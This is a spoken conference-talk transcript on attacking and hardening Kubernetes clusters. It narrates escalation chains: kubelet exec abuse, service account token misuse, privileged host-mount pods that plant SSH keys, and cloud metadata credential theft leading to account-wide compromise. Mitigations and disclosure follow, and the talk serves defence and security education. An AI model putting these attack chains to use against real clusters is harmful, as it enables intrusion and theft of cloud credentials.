 Okay, I'm gonna get started. Hello, my name is Brad Giesemann. Welcome to Hacking and Hardening Kubernetes by Example. If you want to grab the slide link here, it's the first one. And then the GitHub repo that all the demos are being run out of, it's in a separate window for me. You can also run those two in front of you if you're far back and not able to see the text if it's going by a little bit too quickly. I have to apologize that I have to go through it so quickly because I have so much to show and I want to show it to you. So this is more of an index, so to speak. You can go back and then dive in deep as you're at your leisure. A little bit about me. Formerly a penetration tester consultant last five or six years using the cloud almost exclusively designing ethical hacking simulations or capture the flag exercises. And in the past year, we've been running, my former company, we've been running capture the flag exercises on top of Kubernetes inside AWS. That sounds crazy. It is a little bit, but we worked very hard to make sure that was a success. In the past few months, I spent a lot of time looking at as many clusters as I could researching Kubernetes security and policy. And so that body of research that work is what I want to share with you today. So for the past five months, I've installed a few clusters. I've dreamt that I was installing a cluster while I was asleep. It was very surreal. By show of hands, who has a cluster that's listed here or an installer or uses an installer that's listed here with one of those versions are similar to that. Okay, fair number of you. Welcome. How many of you run your own distro? You rolled your own. Brave souls. Awesome. It'll still apply to you, I promise. The biggest takeaway from a security perspective for me is looking at all of these installation mechanisms that the thing that stood out was a malicious user with a shell. By default, I'm saying default on purpose, can very possibly and almost very likely exaltrate source code keys, tokens, credentials, elevate their privilege inside the cluster from a non-privileged state to a privileged state inside of Kubernetes, which often then leads to root access on the underlying nodes. And I think bullet point number four is probably the most interesting or something that hasn't been talked about as much, really expand the blast radius to your entire cloud account in some situations. So I hope to be able to get to that quick enough to be able to cover that in its entirety. The goals of this talk, I want to raise awareness of those high-risk attacks in as many installers or distributions as possible so that everyone has that knowledge. Demonstrate the attacks live. I'm not brave enough to type live, and I don't type quickly enough live, so these are recorded typing sessions, which then that offers you the ability to have at home and look at and examine. Finally, I want to provide some hardening methods for those specific attacks and then additional guidance that goes a few more steps beyond that. So like Morpheus, I'm beginning to believe that high system complexity means for users who are new to a project, that getting it to work from an operator's perspective, getting it to work is hard enough. It's such a wide range of new terminology tools and mechanisms that most people use the defaults the first time through. Look, they probably know better than me, I'm just going to accept the defaults, let's go, see how it works. But defaults tend to have inertia, so defaults in use early tend to stay in use, and systems hardened late tend to break. And that's kind of, as I was going through all the clusters, that was what I was doing, so I was running into it left and right. So my belief is that having default values be secure early on in terms of a project or how you're distributing your project in source code has positive downstream effects to the community. And when something like Kubernetes literally blows up, has widespread adoption, that inertia is big and it's real. And what that kind of leads us into is a, I call it a security capability gap, I struggle with the name for what this is, but basically the community at large is somewhat behind the major dot releases as they're coming out, so maybe you're between 1.5 and 1.7. Most mortals can't literally deploy overnight a brand new Kubernetes release. But most installers and containers of service offerings are keeping up, right? But the trick is that security capabilities and features are coming in newer releases. So if you're still on 1.5 and 1.6, RBAC is really rough for you. But if you're in 1.7 and 1.8, it's been baked in, it's been battle tested and things like that. So it's tough because you have to keep up with those ever fast moving releases. And so it's up to you to add additional security hardening. If you're on 1.6 and 1.7, don't despair, it just needs a lot of elbow grease. And the things I want to talk about today are not extreme in depth esoteric attacks, kernel level exploits and things. I'm talking about low hanging fruit. I believe I found enough of it to share with you and that's enough for a start, right? Want to raise the bar, just doing the basic image safety, RBAC, network isolation, just doing those things and enforcing those basic controls that are already there, already existing inside clusters. So when you go to harden some clusters, what are some of the challenges? Well, a lot of folks like to use Dissistig or CIS benchmarks as a, what do you say, what's the security posture of my cluster? Well, at the operating system level, those specific benchmarks don't take into account the workload that's running on them. They say, you know, is that the password and that's the group, are those properly set with permissions but it doesn't know anything about Kubernetes. And conversely, if you're doing a CIS Kubernetes benchmark, it's not taking into consideration the OS but it's not also taking into consideration how the installer places things and where it puts it and where it grabs it from from the cloud provider. So basically, properly harding your Kubernetes cluster is highly dependent on your environment, your add-ons, your plugins, and the defaults are very often not enough. There's a lot of knobs you have to tweak and we're going to go through some of those. Something I like to call attack driven harding. This is just how I think. It's been built into me as a pen tester. Every time I look at a system, I think this way and I try to reason about a system in this way in terms of its security posture. And the best way I can summarize it is and how I think, I think in progressive steps. I say, from where I am, what can I see do or access next? I pick one of the most plausible methods and I say, all right, assume that happened. All right, now what does it look like? What can I see do or access next? And I repeat until it's game over, until the worst data's got and extracted. And then I work backwards and I harden as I go further away. It's basically quick and dirty attack modeling. So everybody here today can take that persona of the external attacker. If you're looking at a cluster, typically these are the methods you're thinking of right off the bat. Are you going to be able to get SSH access to the nodes? Maybe, not likely. Go through the API server, maybe, not likely. You don't have credentials for either of those. But what about getting a shell on a container inside the cluster? That's where it gets interesting. And the three that I came up with that were right off the bat are exploiting an application running an exposed container. That's hit or miss. Not all apps are extremely vulnerable with a remote code execution. Tricking an admin into running a compromised container. That's interesting. Or compromising a project developer. Compromise their GitHub keys or their Docker registry keys and modifying the project images and binaries. Throughout this research, I did find somebody's credentials in a Git commit by accident. I was just looking at code and I found it and they were, after I reported it to them, they did say it was indeed their company's ability to push to quay. So that is a real deal. So protect your keys. So which is easier? I'm going to pick on number two today, teaching an admin. I've written a couple blog posts, but I've read thousands. And I found something that's kind of a pattern. If you say, here's something really complicated. Use my custom images. Hey, here's my Docker file. Everything's on the up and up. In those instructions is what? A kube control create from that URL. Just slam all these pods and services in and then figure it out and see what happens. I like to think kube control create from URL is the new curl into bash. Because it really is. And it's often worse because now it's distributed across thousands of nodes. I said this is about hacking and hardening. Let's make with hacking. For the rest of the attack structure, this is my 3D diagram of a sacrificial cluster. And the lower left, you have the master node. And the upper right, you have two workers. Very straightforward, very simplistic. We've got a couple of pods running, not all are represented here, but just the ones we care about in this case. And we have the metadata API represented as that yellow block up there. So, my handy-dandy little attacker icon here, if he's able to exploit the vulnerable app in the default namespace, if they get a shell, can they? Install custom tools. And by doing so, prove internet access, which is something that penetration testers always love to have try to pull down your tool sets. Can I install curl, netcat, and that? Can I pull down the kube control binary and put it into a place and run it? That's always interesting. Another look at things. It's not common anymore, but in 1.4.1.5, if you're running 1.4.1.5, a lot of the installers back then, or if you rolled your own, you might still have the insecure bind address on your API server. That's a big no-no. Because there's no authentication or authorization on this. This is a direct pass the cluster admin. So notice that little red triangle. That means a bad day whenever you see a red triangle. Whenever you're doing a penetration test and you break into that first system, the first thing you do is say, what does the world look like? I have no idea. Where am I going? I'm running scanning tools. I'm just throwing packets everywhere. Well, in a distributed system where everything's based on APIs, that enumeration is just a couple curl commands now. If I hit C advisor, heapster, kubelet, Prometheus's node exporter, kube state metrics, any of those, and it's just like, tell me about yourself. Well, here's everything about myself and what they're named and where they're running and what their pod hashes are. Everything is right there. So that leads me to my first demo. Because we have kube control, because we have that access, we can list the nodes and we can see the IP address of one of the nodes. And C advisor runs on 4.1.9.4. And you hit the metrics endpoint. C advisor will happily tell you everything about what's running on this system, including pod names, which are always randomized, the namespace they're in and the container names and the versions, the shahashes, basically everything that I'm running. There's my Redis. We'll get to that guy later. This one I think is fairly well known, but it's incredibly important. The default service count token, if that's located in this directory, it's auto-mounted in a lot of clusters specifically before RBAC. This is a really big deal. If you have RBAC enabled, we'll get to some of that. But if you can run kube CTL, kube control, sorry. I was corrected this morning in the keynote. Kube control, you can get pods, get secrets, and your cluster admin. Again, Red Triangle, bad day. So we can install some tools, download the kube control binary, validate, we can hit the API. Yes, we have the service account token mounted. We can get pods, list all the secrets, look for the good ones, and dump those contents. So four, five curl commands, and we've escalated. Next thing we want to look at, the Kubernetes dashboard. Raise your hands if you run the Kubernetes dashboard. Awesome. Are you running one seven or higher version of the dashboard? Okay. All right. So as you know, there's no authentication on it. It needs protection. All right. So if you're in this vulnerable app pod here, most often you can just hit it by its service name. You don't even need to know what the IP address is, right? Well, that's kind of tough. How do I hit that? It's a curl command. It's a big dashboard. We can forward a port over SSH. That's really two commands away. So yes, we're inside Kubernetes. Let me get the service. Yep. The dashboard's there. Let me get the IP address by pinging it. That's a cheap way to do it without having DIG installed. And then we're going to SSH out to my bad IP. That's my attacking system. Say remote port 8000. Funnel it on down into the dashboard. So on that remote attacking host, you go to local host 8000, and the dashboard is in front of you. What about tampering with other services inside the cluster? As you can see, there's a vote and a redis, the Azure vote front and Azure vote back application. It's a very simple Python app with a redis back. You can vote for cats or dogs, right? Hack the vote. We're going to tamper with it. I grew up with cats, so I'm going to pick on cats today. So we're going to get the service. Azure vote back. Get its IP. Yep. Port 6379 is open. Let's install the redis CLI. Can we connect to it? Yep. We can. Dump the keys. I like cats being 1,000. Let's set cats to 1,000, and let's go hit that web front page. I apologize it's in curl, but you'll see it at the very bottom there. Cats is 1,000. Dogs is 6, right? Take that and extrapolate that to any unauthenticated service inside the back end of your cluster, right? Redis I just picked on because it's simple and straightforward to demonstrate. Here we get a little bit more interesting. The kubelet exploit. How many of you have heard of this attack method? The kubelet exploit. Well, it's basically not an exploit. That's why it's kind of an air quotes. The kubelet API allows this. And in clusters, without certain settings on the kubelet, will allow anybody to connect to this endpoint and exec into containers, ask for logs, and do other nefarious things. So what we're going to do is we're going to ask the kubelet to run a command in a given container on it. So by one curl command, we can say, hey, I want you to exec, you know, list this directory inside that pod right there running on that node. So we get the node IPs right here. Port 1-0-2-5-0. That's the read-write kubelet API port. 1-0-2-5-5 is the read-only metrics port, right? When we hit the method running pods, we're going to cat it out into a file so that it's easier to look at. It's a nice JSON object. Again, very much like CAdvisor, it's everything that I'm running. On the kubelet, this is all I know and what I'm running, complete with the hashes, the namespace, the pod name, and the container name, which is important for the next command. You got the azure vote front, that's the one we're going to pick on. So we're going to look at the web directory of the azure vote front app. Run is the action, default is the namespace, azure vote front, numbers, that's the pod name, and then the container name, and you just say, hey, run the command, list this root directory. App looks like an interesting directory. Main.py looks interesting. We've just extracted the source code for this super sensitive application. Okay. Accessing SCD service directly. Most clusters don't expose SCD to the workers, but some install a separate SCD instance to support Calico or network policy back-ending. And in some cases, that's also exposed with no TLS or authentication or authorization. So in this case, you may be able to defeat the system by storing your network policies, saying, you know what, if there are network policies, but you can hit this at CDN point, you can go in there and say, Calico, forget about all your network policies, and Calico will happily remove all the network policies from your nodes in your cluster. This is pretty rare, but I'll get to the frequency of this one. Now, any of those methods that I showed about getting a kubelet or a service account token will let you possibly schedule a pod that mounts the host file system, add your own SSH key, and then SSH into it. Now, we're getting into the multi-step parts here, but what we're going to do is we're going to get the external, sorry, we're going to get the node name as it's represented inside of Kubernetes, the external IP address of that node so we can SSH into it later, create a very simple pod specification. I pick on engine X because it's based on Debian, but we make sure it's privileged as true and we mount the root file path. Here's what it looks like with the node selector in there so they get scheduled on that one single node. We run it, we exec into it, we trute into the slash root file system bit and now we're on the host as root, add our own SSH key, back on out, and then SSH directly in. So if you're root and you're able to run docker containers under the hood that Kubernetes doesn't know about, run backdoors and solve things, it's a pretty bad day. The last classification of tax I want to talk about is accessing the metadata API. Who's heard of the 169.254, 169.254? We know what that is. One of the things that it does is gives instance data about itself, what region it's in, it's bootstrapping information. That often in some of these installer cases has sensitive S3 paths or CUBE ADM join tokens. So right then and there, that's a bad day, but also most of these cluster installations will provide IAM instance roles attached to the workers and the masters with permissions. Also available via that metadata API are those AWS keys. They rotate every few hours, but they're just a curl command away. So let's curl those and get those. From that vulnerable pod that we talked about, we run one command and we get keys that are valid for a couple hours. We export those into our local shell and our attacking system, right? And then we have the permissions that are available to those keys. So describe instances, list me all the instances in your entire account, not just your cluster, everything in that AWS account. And describe the instance attribute called user data on every single instance in your entire cloud account. How many of you have sensitive things in your user data in things that are not Kubernetes maybe, possibly? That's why this blast radius is pretty bad, because you might not compromise your Kubernetes cluster, but that web server there that bootstraps that has a GitHub key or something in it that might be delivered via user data, you can reach over and go grab that. So that's a bad day for the other administrators. When I talk about IAM permissions, the masters and the workers typically have something that looks like this. Describe star for the worker. Masters have EC2 star. ECR ability to pull images from AWS ECR and some S3 capabilities, but we really want that EC2 star, don't we? That means any AWS EC2 command is available to us. So how would we get that? We need to make sure that curl originates from the master. So there's a couple of ways of doing it, compromising existing pod running on the master. It's kind of tough. Or using one of those two issues that we just talked about, if you find a service account token, just ask in the API server, or just ask the cooblet running on the master to run a command for you inside of a pod. So it looks like this, basically wrapping a curl command this way or this way. Notice how close they are. Basically the same thing, just asking somebody different to do it. And the final example of why this is a bad day, if you have EC2 star, you can create a new VPC, create a new security group, create a new SSH key, create a new instance, and snapshot every volume from every single instance in your entire cloud account, and then go ahead and mount it on that instance. So that can be automated, as you can imagine, within five or 10 minutes. It's a pretty bad day. So if you're also on the master, you then might be able to, in some cases, based on the installation by default, list everything in AWS S3. Who stores logs and sends it to backups in S3? It's a bad day. So attacks 9 and 10, I'm switching gears. I'm now talking about GKE and GCE. And GKE specifically, there's an attribute, much like the user data endpoint on the API. There's an attribute called kubnv, and that's what the kublet uses to bootstrap itself. It gets its keys from it. That's often reachable directly. Just clicked. There we go. So here's that listing. Part of the security features, though, you have to pass a header into Google's API to make sure that you're doing it, not through a server-side request forgery. But configureSH looks interesting, kubnv looks interesting, user data looks interesting. So we can go poke at those. This reference is the kubnv. So right there, you can see there's a lot of good stuff. We know what the release is. We know where it's getting things from. We know what the IPs of the master are. But we can see that here's the kublits information on where it gets its keys, cert, and cipm. Right? This wall of text is what I call the one-shot. So if you get a shell on the container inside of GKE, you can become the kublet in this one-shot, awesome bash hunk of junk here. Pull down a kube control, grab the kubnv from the metadata API, strip out the parts, base64 to code them into the kublits authentication tokens, and then run kube control to list all the pods and all the namespaces. So one of the things of note is you want to probably get the secrets, right? Well, the kublet doesn't have the ability to go list all the secrets, but it can pull a secret if it knows its name. Well, the best way to get that is to output all of the get pods in YAML, or a pod that you know of specifically. And I did the dashboard here because I know it's got the cluster admin token. You can say, hey, dump the pod spec in YAML, and it will tell you the mounted secret by its name. So now you know what that is. You can go get that secret directly. In this case, it's the default service count token in the kube system namespace. So what we're going to do with that is the same thing. I'm actually going to skip this part for the sake of speed. Mount host file system at SSH and SSHN. The second method through the GKE and GC metadata API is just like in EC2, assigning permissions to instances. GKE does the same thing. They give you an IAM token, and they give you instance scopes. And that IAM token lets you talk to the Google API, compute API, and run actions on things inside the scope of that project. And one of those things that you can do is enumerate all the instances, of course, but you can also use this really handy-dandy API method called add SSH key. So if you have these privileges and you have this token, you're able to be on worker one, call for the token, go hit the API saying, hey, add my SSH key to worker two. And Google will happily do that if you're authenticated. And then you can SSH into worker two, or anything inside that scope of that project. So if you're running multiple clusters, that means any of those nodes in all the clusters in that same project. So we're going to get the external IP, so we know what to SSH into when we're done. We're going to basically list the instances in the project. Okay. We're going to page through it a little bit, just so you can see how much information is here. A lot of good stuff. The addresses, external NATs, things. The user data, the QBNV, for all the instances inside the project. You're doing an AWS EC2 describe instances, that equivalent inside of Google as well. Okay. So I'm going to go ahead and do that same thing, but describe instance. I'm going to see everything about this one node, so I can get its fingerprint, which is needed for this API column about the form. And forgive me, I use curl and bash to keep it simple. But you don't need to download the extra tools. There's no malware running here. It's all curl and bash and such. So what we do is we make a post body with that fingerprint that we just pulled. Add my SSH key, as you can see, the public key. We're going to post it to that API. I'm going to show you what it looks like rendered. That's what the final post body looks like. Here, Google, go add me to worker 2. Okay. Happily does it. And we're root on that second node. Again, a bad day. Okay. RPS. How prevalent are these issues? This is what compelled me to do this talk. And I want to stress something. This is not the entire security posture of every one of these clusters. This is a narrow band of these items that I've identified here. It doesn't say anything about the rest of them. These specific versions, the ones that I tested, note those versions. I started testing in August and September. We'll get to what the latest releases look like. So it's prevalent, right? You'd admit that it's not uncommon. So don't despair. We can do it. We have the technology. Attack 7 through 10. If you're running an AWS, I recommend what's called a metadata proxy, something that makes sure that when you go to 169, 254, that you're allowed as a pod. Kube to IM or KIM both worked in my testing to make sure that an AWS you're taken care of. Excuse me. The GCE metadata proxy and these steps, and I apologize the word these steps is actually masking Google's GKE hardening blog post that was released very recently. That is an incredibly important link. I apologize that was a late addition. That is really useful for blocking those attacks that I just showed, right? And if you're running network policy on 1.8, that is also a valid method egress blocking. And if you're running older versions of Kubernetes like I was and you're using Calico, you can use Calico CTL under the hood to get that same effectiveness. It's not through the Kubernetes API, but you can do it. Protect the KubeLit. Authorization mode webhook. If you don't see that, that's your KubeLit is probably allowing that KubeLit exploit bit. Isolating workloads. Remember that hack the vote there, a very simple network policy literally stops out in this tracks. You say, every pod that has the label azure vote back, make sure that it only gets ingress from azure vote front. Excuse me. This is almost 99% perfect drop in if you're running the dashboard and you have network policy ingress support. Drop this in and it will protect your dashboard. Excuse me. It's a bit of a trick. We have the pod selector that says the Kubernetes dashboard only, but there's no rules. So by default, that means a default deny. This does not block Kube control proxy. That works through the API server. This is blocking from pods, which have no business talking to the dashboard. Restricting the default service account token node and RBAC and node restriction. And I want to stress something. You have to exact in the pods and verify this. It's very easy to miss this or do this incorrectly if you're messing with RBAC. And monitor all RBAC audit failures. You either have a misconfiguration of your app or somebody's attacking you and they're failing. And I'm happy to say in 1.8 and above supporting egress natively, this policy works in your clusters as a really nice default deny platform. Apply this to every single one of your namespaces, which says ingress and egress, nothing is allowed. Except Kube DNS lookups to start. Put this down as a cluster administrator and then deploy your network policy for your workloads with your workload lifecycle. So when you're deploying Azure Vote front and back, apply the network policy that allows those two to work together at that time. Excuse me. And I'm happy to say that throughout these last five months I've worked with every single one of these projects directly disclosing the issues that I found. A lot of cases they were already in progress, already in flight fixing them. But with newer releases and Kubernetes 1.8 and a little bit of elbow grease, we can look like this. We can literally wipe out this classification of vulnerabilities for good and make the infrastructure nice and boring. Two tools I want to tell you about. Kube ATF. It was a tool that I wrote to help automate the creation and validation and destruction of all these clusters in a sane way. Because I spun them up every day for two hours and threw them away, kept going through all of them. Excuse me. And Heptio Sonobooey. I wrote a plugin, it was basically a proof of concept. There's so much more you can do with this. I currently run a CIS benchmark using Aqua Security's Kube Bench. So by deploying this plugin into Sonobooey, we can continually scan our nodes for posture assessment in a very sane way. So even more security hardening tips. This is where it goes above that line on that apple tree I showed you. This is where it gets a little bit more advanced. Let's assume that you've all done all the things that I just suggested. Here's what you want to look for. You want to verify that all your settings are properly enforced. I can't tell you how many times I thought I hardened something and I go validate it and I didn't do it just correctly. I didn't get that labeled just right, it's important that you validate those. There are other features in every dot release. Audit all the levels that you can, the OS, the runtime and Kubernetes, I like the CIS benchmarks. Log everything outside the cluster. That's important. Practice safe image security. There's all sorts of good talks and blog posts about this and tools that help with that. I already covered the Kubernetes components a bit, but the network security policy bit is incredibly important now that we have Ingress and egress, use that to your advantage. You can mask a lot of attacks by just not having network access. Protect your workloads by default by saying no Ingress and egress and then apply what you're allowed to. It's white listing, not block listing. I added this the other day, considering a service mesh, there's a lot of benefits other than all the things that it does for your application and visibility and mutual TLS, but it makes your workloads more isolated when they talk to each other, just by default and how it works. I think some folks have talked about this before, but namespaces.pretendant is really good when you combine it with that default deny policy set. If you have microservice here, microservice here, microservice here, they're all default denies. By default, microservices can't talk to each other until you allow them. You can be explicit. This is something we learned from the capture the flag exercise. Make sure that CPU and RAM limits and I know disk and network are somewhere down the line to prevent malicious actors from just filling the disk or consuming all sorts of RAM with all sorts of tools. Something that people don't talk about which I think is kind of interesting is on your pod specs, if you're running a pod that has no business talking to the API server, in your pod spec, don't mount the service count token. You don't need it, don't put it there, even if it's got no permissions, right? Defense and death. And use a pod security policy to enforce container restrictions and protect the node. That's something that's going to mature over the next few releases. And shout out to some of the vendors that I talked to. This is kind of an important note, the container where malicious activity and behavioral detection capabilities. That's incredibly important for stopping the initial attack right where it started. It's at an assist call level. Shell cannot happen. A curl cannot be downloaded. It cannot be exact, et cetera. You stop it, it just tracks right down there. Number three in the miscellaneous security bit, separate cloud accounts, projects or resources groups for different workloads or different clusters. I think a one-to-one mapping is safe for now. It's just too... There's too many ways to hop across. And don't run dev and test workloads and clusters at the same time as production or in the same place as production. Again, because of so much opportunity for crossover. And depending on your regulatory requirements, separate node pools for separate workloads using annotations to make sure sensitive stuff happens here. Non-sensitive stuff happens over here. Here's some of the tools that I came across that I found of note that you might want to take advantage of when you're looking at auditing. The CIS benchmark has been updated from 1.8. That's a great resource. CUBE Bench implements it nicely. Very straightforward to run. The CIS, OS and runtime hardening, stuff from DevSec and Ansible hardening from Major Hayden and the other folks from OpenStack are really good at making sure the underlying postures on your systems are great. And then CUBE Audit, which I'm looking forward to. I think that's the next talk. And Sonabui. I think there's a lot of room for growth here in this space. Notable security features in 1.8. Network policy and pod security policy, whitelisting. The egress is huge. Volume mount whitelisting prevents a lot of those node access bits that I was just showing you. So in closing, as a community we're all responsible for that safety and security applications that power our world. Let's make that foundation secure by default and incredibly boring. Thank you. Okay, first I want to say thanks to all those folks that I listed on the left there on the right. Yes, some of those installers implement CUBE ADM, CUBE Admin. It's the join token. You've got to protect that. And then there's a lot of good stuff that happens. Yes, yes. Certificate rotation expiration. Yes, sir. The questions, what's the number one? All of the above. But the first thing is enabling RBAC. A huge classification of those things don't happen in a properly configured RBAC enabled cluster. And then the rest still you have to do. Because notice how all the things that I was doing required no special tools. It was just access that you have. So combining that with network policy just, it shuts off everything to start. You might have a vulnerable cubelet, the cubelet exploit, but if you have an egress policy you can stop that network access assuming you put it under your namespace. So you can mitigate and work around without having to fix the underlying things with some clever policies. I knew that question would happen. Did I look at OpenShift? The answer is yes. I wanted to focus on vanilla Kubernetes because as you know OpenShift is a slightly opinionated distribution of Kubernetes. The only thing that applies to OpenShift from the things that I talked about by default is the metadata API. However, they don't put anything sensitive in user data but I am credentials associated with those workers by default that you would get that. If you go ahead and do that, then that's available and they'll need the metadata proxies but that's the only thing. I hesitated in lumping it in there because it's such a different beast compared to how all these were lined up. It's a little bit of an unfair comparison but I would highly recommend you look at OpenShift in terms of at least a reference point for their security model. I have no horse in the race. I'll be in the hallway if you have any questions. Thanks so much.